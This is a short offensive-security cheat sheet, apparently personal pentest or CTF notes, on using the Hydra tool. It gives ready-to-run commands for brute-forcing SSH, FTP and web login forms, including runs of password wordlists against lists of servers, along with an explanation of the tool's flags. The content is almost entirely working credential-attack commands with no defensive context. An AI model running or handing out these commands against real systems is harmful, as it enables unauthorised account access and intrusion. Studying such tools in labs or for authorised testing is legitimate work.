▒█████ █████▒ █████▒ ██████ ▓█████ ▄████▄ ██▒ █▓ ▄▄▄ █ ██ ██▓ ▄▄▄█████▓ ▒██▒ ██▒▓██ ▒▓██ ▒▒██ ▒ ▓█ ▀ ▒██▀ ▀█▓██░ █▒▒████▄ ██ ▓██▒▓██▒ ▓ ██▒ ▓▒ ▒██░ ██▒▒████ ░▒████ ░░ ▓██▄ ▒███ ▒▓█ ▄▓██ █▒░▒██ ▀█▄ ▓██ ▒██░▒██░ ▒ ▓██░ ▒░ ▒██ ██░░▓█▒ ░░▓█▒ ░ ▒ ██▒▒▓█ ▄ ▒▓▓▄ ▄██▒▒██ █░░░██▄▄▄▄██ ▓▓█ ░██░▒██░ ░ ▓██▓ ░ ░ ████▓▒░░▒█░ ░▒█░ ▒██████▒▒░▒████▒▒ ▓███▀ ░ ▒▀█░ ▓█ ▓██▒▒▒█████▓ ░██████▒▒██▒ ░ ░ ▒░▒░▒░ ▒ ░ ▒ ░ ▒ ▒▓▒ ▒ ░░░ ▒░ ░░ ░▒ ▒ ░ ░ ▐░ ▒▒ ▓▒█░░▒▓▒ ▒ ▒ ░ ▒░▓ ░▒ ░░ ░ ▒ ▒░ ░ ░ ░ ░▒ ░ ░ ░ ░ ░ ░ ▒ ░ ░░ ▒ ▒▒ ░░░▒░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░ ▒ ░░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░
Hydra Usage
brute force attacks!! exist GUI and CLI mode ::: get help # hydra -h ::: brute force protocol # hydra -l [user] -p [password] -t [numberthreads] [ip_addr][protocol] :: SSH brute force # hydra -l [username] -p [password] 10.10.10.1 -t 50 ssh :: FTP brute force # hydra -l [username] -p [password] ftp://10.10.10.1 :: HTTP-POST-FORM # hydra -l [username] -P [wordlist] 10.10.10.1 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V # hydra -l [username] -P [wordlist] 10.10.10.1 http-post-form "/[login_page]:username=^USER^&password=^PASS^:message" -V # hydra -l [username] -P [wordlist] 10.10.10.1 http-post-form "/login.php:username=^USER^&password=^PASS^:message" -V ^USER^ = variable used to use the users provided ^PASS^ = variable used to use the passwords provided message = message to known an incorrect value, refer to the error message after trying to login with invalid creds. ::: brute force list of servers # hydra -v -l b0ydC -p qwerty -t 50 -M /usr/servers.txt ssh ::: brute force & use list of passwords # hydra -v -l b0ydC -P /usr/pass.txt -t 50 -M /usr/servers.txt ssh FLAGS: -v = verbose -l = username -p = password -P = passwordlist [path to file] -t = number of threads -M = list of servers -o = output to a file